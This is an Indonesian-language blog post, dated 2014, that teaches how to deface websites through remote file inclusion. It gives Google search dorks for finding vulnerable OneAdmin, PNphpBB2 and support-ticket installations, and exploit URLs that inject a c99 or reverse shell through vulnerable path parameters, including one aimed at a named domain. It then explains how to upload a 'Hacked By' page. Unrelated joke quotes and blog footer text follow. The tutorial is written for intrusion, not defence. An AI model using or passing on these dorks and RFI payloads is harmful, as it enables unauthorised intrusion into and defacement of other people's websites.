Selasa, 11 Februari 2014

+++CARA MUDAH DEFACE WEB VIA RFI+++

CARA MUDAH DEFACE WEB VIA RFI



Sebelum kita membahas cara mendeface web via RFI, kita harus mengetahui beberapa perintah yang digunakan untuk melakukan deface

cd Nama directory : Melihat suatu directory yang kita pilih
ls –al : Untuk melihat suatu directory tertentu lebih rinci lagi
cat : membaca suatu file atau berkas lainnya
w : agar mengetahui siapa sajakah yang telah menggunakan shell
pwd : mengetahui di suatu directory manakah kita berada
tar –zxvf : Mengextract sutau files yang berbentuk atau berektensi tgz
find : untuk memantau suatu direktori-direktori tertentu
uname –a : untuk mengetahui path berada
curl : untuk mendownload URL tertentu
wget : untuk mengupload suatu file yang kita tentukan
[EvilShellInject] : inject rshell / c99 kamu

KITA MULAI !!
Kita akan memulai dengan PHP, karena PHP banyak sekali BUG nya
Sebelumnya kita cari dulu RFI nya dulu di http://www.milw0rm.com
-          Site Oneadmin RFI
Sekarang tugas kamu adalah googling di paman google degan kata kunci oneadmin site:.com
Lalu saya kasih dech contoh path nya http://target.com/oneadmin/config.php?path[docroot]=
Contohnya :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
-          PnPhpBB2
Lalu kamu googling lagi dengan kata kunci modules.php powered by pnphpbb2 site:.com atau apa saja dech yang kalian kehendaki
Sekarang saya kasih contoh path nya http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contohnya :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
-          Support ticket
Kita googling lagi pake paman google,, ( cape juga yach googling terus...hehe ) dengan kata kunci include/main.php site:.com atau yang kalian inginkan
Sekarang saya kasih contoh path nya http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contohnya :
http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

SELESAI....

Setelah itu buatlah sebuah file index.html
Isi dengan Hacked By Nama kamu, nama hewan peliharaan mu, nama ibu mu, nama ayah mu, nama tetangga mu, TERSERAH....
Tau ga cara nya membuat file index.html ?

Cara ini untuk kalian yang belum paham...maaf yang sudah paham, bukan bermaksud untuk menggurui kalian..
Cara nya kamu buka notepad ( atau notepad++ yang lebih komplit bisa juga pake software html editor lainnya )
Tulislah :

HACKED BY NAMA KAMU, atau yang lainnya

(atau bisa pakai kode html lainnya yang telah kalian ketahui)

Lalu kalian upload file index.html kamu ke direktorinya
Lalu kalian buka dech website yang telah kalian Deface
Contoh : http://target.com/lokasipathnya/index.html

SUKSES !!
Diposting oleh Unknown di 04.29

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

Daftar Blog Saya

KATA KATA LUCU

Untung sekali cinta itu buta. Coba kalo bisa ngelihat? orang jelek pasti ngga laku.
Untuk sementara ini bagi teman-teman yang ingin menulis di dinding FB saya, saya mohon maaf karena dinding FB saya sedang di cat

Jangan mentang-mentang kamu anak Gaul. Pas dikejar anjing bukannya lari malah bilang “terus Gue harus kabur sambil bilang wow gitu?
Diberdayakan oleh Blogger.

DOWNLOAD LAGU ALL MP3 AND VIDEO

DOWNLOAD LAGU ALL AND VIDEO
anandaris © 2008 Template by:
SkinCorner